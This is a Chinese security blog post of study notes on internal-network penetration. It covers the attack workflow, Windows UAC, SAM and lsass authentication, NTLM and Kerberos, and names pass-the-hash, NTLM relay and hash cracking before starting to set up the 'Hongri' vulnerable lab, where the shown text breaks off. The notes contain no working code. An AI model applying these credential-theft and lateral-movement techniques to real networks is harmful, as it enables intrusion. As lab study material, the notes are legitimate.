<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="xiaolaisec">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://laijunyue.github.io/2025/11/04/内网安全-专题/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="第一章 内网基础知识1.渗透的大致思路信息收集-&gt;漏洞利用(主要是web漏洞)-&gt;权限提升-&gt;权限维持(反弹shell)-&gt;内网代理-&gt;内网渗透-&gt;痕迹清理(后渗透) 2.内网渗透的大致思路内网信息收集(防火墙，IP段，端口，定位域控，域用户，杀软)-&gt;内网漏洞利用-&gt;[[横向移动(重要)]]-&gt;跨域攻击 3.什么是域(重要)域可以说是升级版的">
<meta property="og:type" content="article">
<meta property="og:title" content="内网安全 专题">
<meta property="og:url" content="http://laijunyue.github.io/2025/11/04/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E4%B8%93%E9%A2%98/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第一章 内网基础知识1.渗透的大致思路信息收集-&gt;漏洞利用(主要是web漏洞)-&gt;权限提升-&gt;权限维持(反弹shell)-&gt;内网代理-&gt;内网渗透-&gt;痕迹清理(后渗透) 2.内网渗透的大致思路内网信息收集(防火墙，IP段，端口，定位域控，域用户，杀软)-&gt;内网漏洞利用-&gt;[[横向移动(重要)]]-&gt;跨域攻击 3.什么是域(重要)域可以说是升级版的">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251119172129218.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113083758458.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084122935.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084255319.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084307165.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084334788.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084512158.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085021089.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084738201.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113084701572.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085146743.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085232350.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085253901.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085409810.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113085448399.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113091014818.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113091308954.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113091711185.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113092726921.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113092747646.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113092805173.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113092813299.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251119172350099.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113093000357.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113093147160.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113093248462.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251113093312807.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251117095549117.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251117095611002.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092323996.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092411444.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092517396.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092616331.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118152625752.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118152727262.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092912397.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118092940731.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093006391.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093454273.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093606967.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093702786.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093739108.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093800566.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093843544.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118093914869.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118094240059.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118094415153.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251123221407447.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151027895.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151057342.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151118171.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151159740.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151236598.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118181219292.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151316259.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151420485.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151615299.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151644926.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151818580.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118151941717.png">
<meta property="og:image" content="http://laijunyue.github.io/images/image-20251118152033796.png">
<meta property="article:published_time" content="2025-11-04T01:35:22.000Z">
<meta property="article:modified_time" content="2025-11-27T01:06:36.165Z">
<meta property="article:author" content="xiaolaisec">
<meta property="article:tag" content="CS">
<meta property="article:tag" content="MSF">
<meta property="article:tag" content="TGT&amp;ST">
<meta property="article:tag" content="横向移动">
<meta property="article:tag" content="Kerberos">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://laijunyue.github.io/images/image-20251119172129218.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/background.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/background.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/background.jpg">
    <!--- Page Info-->
    
    <title>
        
            内网安全 专题 -
        
        Welcome to xiaolaisec&#39;s blog
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    
<script src="/js/libs/anime.min.js"></script>

    <h1 class="ml13">
        Welcome to xiaolaisec&#39;s blog
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    window.config = {"hostname":"laijunyue.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","delete_mask":false,"headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null},"highlight_theme":{"light":"github","dark":"vs2015"}},"toc":{"enable":true,"max_depth":6,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]},"pangu_js":false},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null},"side_tools":{"gear_rotation":true,"auto_expand":false}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/background.jpg","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"xiaolaisec's blog","subtitle":{"text":["欢迎来到我的博客(｡･∀･)ﾉﾞ","悟已往之不谏，知来者之可追...","随心所欲地享受每一天\\(￣︶￣*\\))","随时随地，浏览记录O(∩_∩)O","如果喜欢，建议给个支持( •̀ ω •́ )✧","喜欢的话，留个言好嘛(oﾟvﾟ)ノ","你有建议？反馈作者(●^◡^●)","文字正在不断轮换(*￣3￣)╭","正在努力更新博客(ง •_•)ง","正在不断努力改善博客中ε=( o｀ω′)ノ"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn","show_author":false},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null},"style":"default"}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.6.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true},"width":{"home":"1200px","pages":"1000px"}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null,"show_on_mobile":true},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3},"excerpt_length":200},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container">

    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Welcome to xiaolaisec&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">22</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">46</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">内网安全 专题</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/xiaolai.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">xiaolaisec</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-11-04 09:35:22</span>
        <span class="mobile">2025-11-04 09:35:22</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-11-27 09:06:36</span>
            <span class="mobile">2025-11-27 09:06:36</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/CS/">CS</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/MSF/">MSF</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/TGT-ST/">TGT&amp;ST</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Kerberos/">Kerberos</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="第一章-内网基础知识"><a href="#第一章-内网基础知识" class="headerlink" title="第一章 内网基础知识"></a>第一章 内网基础知识</h1><p>1.渗透的大致思路<br>信息收集-&gt;漏洞利用(主要是web漏洞)-&gt;权限提升-&gt;权限维持(反弹shell)-&gt;内网代理-&gt;内网渗透-&gt;痕迹清理(后渗透)</p>
<p>2.内网渗透的大致思路<br>内网信息收集(防火墙，IP段，端口，定位域控，域用户，杀软)-&gt;内网漏洞利用-&gt;[[横向移动(重要)]]-&gt;跨域攻击</p>
<p>3.什么是域(重要)<br>域可以说是升级版的工作组，由于工作组很灵活，不方便管理，没有[[统一的管理]]的管理，因此诞生了[[域]]，域可以理解为统一管理的一片主机区域，其中[[域控]]是域的最高管理员，只要是该域内的成员，无论做什么事情(加入域，退出域，以及下载软件)都要经过域控的批准(即域控的账号和密码)，才可以进行操作。域控可以分配域成员的身份和权限。每个域都有一个域名，一个域可以派生多个子域。</p>
<h1 id="第二章-用户权限"><a href="#第二章-用户权限" class="headerlink" title="第二章 用户权限"></a><strong>第二章 用户权限</strong></h1><p>一.工作组权限<br>1.本地用户组<br>2.本地最高管理员权限(administrator)<br>3.本地普通管理员权限<br>4.本地普通用户<br>5.UAC认证是什么</p>
<p>UAC(User Account Control 用户账户控制)，主要功能是 在进行一些会影响系统安全的[[高权限]]操作时，会自动触发UAC(即许可提示窗口)来提醒用户，用户确认后才能执行操作。</p>
<p>UAC的触发条件:<br>1.修改Windows Update配置；<br>2.增加或删除用户帐户；<br>3.改变用户的帐户类型；<br>4.改变UAC设置；<br>5.安装ActiveX;；<br>6.安装或卸载程序；<br>7.安装设备驱动程序；<br>8.修改和设置家长控制；<br>9.增加或修改注册表；<br>10.将文件移动或复制到Program Files 或 Windows目录下；<br>11.访问其他用户目录</p>
<p>UAC的四种设置：<br>1.始终通知；<br>2.仅在程序尝试对我的计算机进行更改时通知我；<br>3.仅当程序尝试对我的计算机进行更改时通知我(不降低桌面亮度)；<br>4.从不通知   <code> 就算设置不弹框，认证还是在，对于普通管理员只是省略了点击是的按钮；对于普通用户，还是会弹窗并且要输入超管的密码。</code></p>
<p>Windows计算机可  Win+R 输入 msconfig 来设置UAC6.<code>本地系统最高权限(system)</code></p>
<p>二.域内机器权限<br>注意：机器加入到域之后可以选择使用域内用户登录，也可以使用本地用户登录，注意以下的区别<br>1）本地用户登录，用户信息是存放在本地文件中然后本机进行校验；域内用户登录，用户信息是通过DC域控的校验认证后才能登录，用户信息存放在域控上。<br>2）本地用户登录主要对比的是<code>NTLM HASH值</code>，域认证是通过<code>kerberos认证</code>。<br>3）机器可以选择本地登录或者域用户登录，本地用户登录：机器名\用户名 密码；域用户登录 域名\用户名 密码。</p>
<p>1.域内用户组<br>2.域内最高管理员权限(目标)<br>3.域内普通管理员权限(提权)<br>4.域内普通用户权限<br>5.机器用户和system关系(提权)</p>
<h1 id="第三章Windows认证机制和协议-重要"><a href="#第三章Windows认证机制和协议-重要" class="headerlink" title="第三章Windows认证机制和协议(重要)"></a>第三章Windows认证机制和协议(重要)</h1><h2 id="本地认证"><a href="#本地认证" class="headerlink" title="本地认证"></a>本地认证</h2><h3 id="1-本地认证概述"><a href="#1-本地认证概述" class="headerlink" title="(1)本地认证概述"></a>(1)本地认证概述</h3><p>电脑开机(winlogon.exe)–(账号密码)–&gt;Lsass.exe进程–和SAM文件中的密码对比–&gt;SAM文件</p>
<p>Windows Logon Process (即winlogon.exe)是Windows NT 用户登录程序，用于管理用户登录和退出，且以system权限运行。用户注销、重启、锁屏后，操作系统会让winlogon.exe执行从而显示登陆界面。</p>
<p>lsass.exe是一个系统进程，用于微软Windows系统的安全机制，进行本地安全和登录策略，即我们输入帐户密码后就会执行这个进程到<code>SAM文件</code>进行我们密码的认证。SAM文件是位于C:\Windows\System32\config\目录下，用于存储本地所有用户的凭证信息，但这并不代表你可以随时随意去查看系统密码。</p>
<h3 id="2-SAM文件和lsass进程"><a href="#2-SAM文件和lsass进程" class="headerlink" title="(2)SAM文件和lsass进程"></a>(2)SAM文件和lsass进程</h3><p>SAM文件是Windows的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中，简单格式如下：<br>[[用户名称:LM-HASH值(用户明文密码经过LM-HASH加密后的值):NTLM-HASH值]]<br>如：administrator:BBBBD587519FE693CD83CABBA4F3AB17:77269418bfae986e554cff5de4fd59fe<br>SAM文件中的密码并不是以明文的形式存在，而是加密存储在SAM文件中</p>
<p>Lsass.exe进程的作用非常重要，其主要负责管理[[本地安全策略和认证机制]]。这些策略包括密码策略、账户策略、用户权限、域策略等等。同时还负责对用户进行身份验证，以确保只有授权的用户才能访问系统资源。<br>重要作用<br>    1.将winlogon进程传过来的[[明文账号密码进行加密]]，然后和SAM文件中的[[密文账号密码做对比]]，如果对比成功就可以实现登录。<br>    2.将收到的明文账号密码在本地内存中保留一份做备用。</p>
<p>(3)LM Hash加密步骤</p>
<h3 id="4-本地认证中的安全问题"><a href="#4-本地认证中的安全问题" class="headerlink" title="(4)本地认证中的安全问题"></a>(4)本地认证中的安全问题</h3><p>1.如果控制了某台个人PC机，如何获得用户的明文账号密码？<br>2.在windows server 2012和windows8之后会有补丁，lsass.exe进程不会在内存存一份用户明文密码了，该怎么办？<br>3.我能否在验证用户身份的时候不经过lsass.exe进程直接通过用户明文密码加密后的HASH值与SAM文件中的加密密码进行对比？</p>
<h2 id="网络认证"><a href="#网络认证" class="headerlink" title="网络认证"></a>网络认证</h2><h3 id="1-网络认证概述和介绍"><a href="#1-网络认证概述和介绍" class="headerlink" title="1.网络认证概述和介绍"></a>1.网络认证概述和介绍</h3><p>碰到工作组的计算机，主机A想访问主机B上的资源，就要向主机B发送一个存在于主机B的一个帐户，主机B接收以后会在本地进行验证，如果验证成功，才会允许主机A进行相应的访问。</p>
<p>1.用户名和密码认证：这是最常见的认证方式，用户需要提供有效的用户名和密码，从而认证其身份。这种认证方式<code>适用于本地计算机账户</code>或<code>域账户</code>。</p>
<p>2.<code>Kerberos认证(重点)</code>：Kerberos是一种网络身份验证协议，在<code>Windows域环境</code>中广泛使用。它通过使用<code>票据</code>和<code>票据授权票证(TGT)</code>来验证用户身份，并生成会话密钥用于加密通信。</p>
<p>3.<code>NTLM认证(重点)</code>：NTLM(NT LAN Manager)是一种早期的Windows网络认证协议，它使用基于挑战-响应的方式进行身份验证。尽管Kerberos已经成为首选的认证协议，但NTLM仍然在某些情况下使用，特别是在与旧版Windows系统或非Windows系统进行交互操作时用到。</p>
<p>4.密钥身份认证：Windows还支持使用密钥来进行身份认证。这种方式涉及使用预先共享的密钥来对用户进行身份验证，通常用于特定的场景和应用。</p>
<p>5.远程桌面认证(Remote Desktop Authentication)：远程桌面是一种远程访问Windows计算机的功能。在远程桌面连接时，用户需要提供目标计算机的凭据进行认证，以验证身份并获得远程访问权限。</p>
<p>2.NTLM协议挑战响应认证机制</p>
<p>3.抓包流量分析NTLM协议</p>
<p>4.Challenge和Response分析</p>
<p>5.NTLMv1和LTLMv2的区别</p>
<h3 id="6-NTLM协议安全问题"><a href="#6-NTLM协议安全问题" class="headerlink" title="6.NTLM协议安全问题"></a>6.NTLM协议安全问题</h3><p>A主机与B服务器进行NTLM认证，如果此时C主机抓取到了A与B之间认证的数据包，或者C伪造A发送认证数据包，此时B也会将C看成是自己的“朋友”，所以NTLM认证是存在安全问题的，最终的身份还是无法确定是否是“自己人”。</p>
<p>1.PTH攻击(Hash传递)：因为NTLM协议认证过程中使用到用户的NTLM-hash值的计算，如果我们知道对方电脑的Hash值就可以进行PTH攻击<br>2.NET-NTLM hash relay攻击：NTLM中间人攻击，如果获得NET-NTLM v1 Hash，可以重放其hash值进行认证<br>3.NET-NTLM v1 v2 Hash破解：v1比较简单，容易破解使用DES，如果是v2就要使用md5碰撞的方式可以使用彩虹表或者暴力破解等方式，获取明文的账号密码</p>
<h2 id="域Kerberos认证"><a href="#域Kerberos认证" class="headerlink" title="域Kerberos认证"></a>域Kerberos认证</h2><h3 id="1-Kerberos协议简介"><a href="#1-Kerberos协议简介" class="headerlink" title="1.Kerberos协议简介"></a>1.Kerberos协议简介</h3><p>Kerberos也是一种[[网络认证协议]]，其设计目标是通过密钥系统为 客户机&#x2F;服务器 应用程序提供强大的认证服务。该认证过程的实现[[不依赖于主机操作系统的认证]]，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下，Kerberos作为一种可信赖的第三方认证服务，是通过传统的密码技术(如：共享密钥)执行认证服务。</p>
<p>简单来讲，Kerberos协议认证就是一个第三方认证机构，客户机&#x2F;服务器 双方并不需要去建立信任关系，他们之间是否信任直接去问这个第三方认证机构(Kerberos)就可以了。</p>
<h1 id="红日靶场搭建与复现"><a href="#红日靶场搭建与复现" class="headerlink" title="红日靶场搭建与复现"></a>红日靶场搭建与复现</h1><p>地址：<a class="link"   target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/" >http://vulnstack.qiyuanxuetang.net/vuln/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="靶场1"><a href="#靶场1" class="headerlink" title="靶场1"></a>靶场1</h2><p>环境链接：<a class="link"   target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/" >http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h3 id="搭建"><a href="#搭建" class="headerlink" title="搭建"></a><strong>搭建</strong></h3><p>下载靶场主机，是虚拟机文件，直接用虚拟机打开就可以用了，但是需要配一下网段</p>
<p>如图打开会有一个后缀名为vmx的文件，点击即可</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251119172129218.png"
                      alt="image-20251119172129218"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113083758458.png"
                      alt="image-20251113083758458"
                ></p>
<p>环境拓扑图</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084122935.png"
                      alt="image-20251113084122935"
                ></p>
<p>修改虚拟网络配置</p>
